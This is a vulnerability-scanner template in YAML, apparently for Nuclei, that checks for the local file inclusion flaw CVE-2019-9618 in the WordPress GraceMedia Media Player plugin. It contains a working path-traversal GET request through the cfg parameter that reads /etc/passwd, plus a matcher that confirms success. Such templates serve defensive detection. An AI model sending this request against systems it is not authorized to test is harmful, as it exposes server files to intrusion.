37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
|
id: CVE-2019-9618
|
||
|
|
||
|
info:
|
||
|
name: WordPress GraceMedia Media Player 1.0 - Local File Inclusion
|
||
|
author: daffainfo
|
||
|
severity: critical
|
||
|
description: WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.
|
||
|
reference:
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
||
|
- https://seclists.org/fulldisclosure/2019/Mar/26
|
||
|
- https://www.exploit-db.com/exploits/46537
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 9.8
|
||
|
cve-id: CVE-2019-9618
|
||
|
cwe-id: CWE-22
|
||
|
tags: wordpress,wp-plugin,lfi,seclists,edb,cve,cve2019
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0:"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- 500
|
||
|
|
||
|
# Enhanced by mp on 2022/05/03
|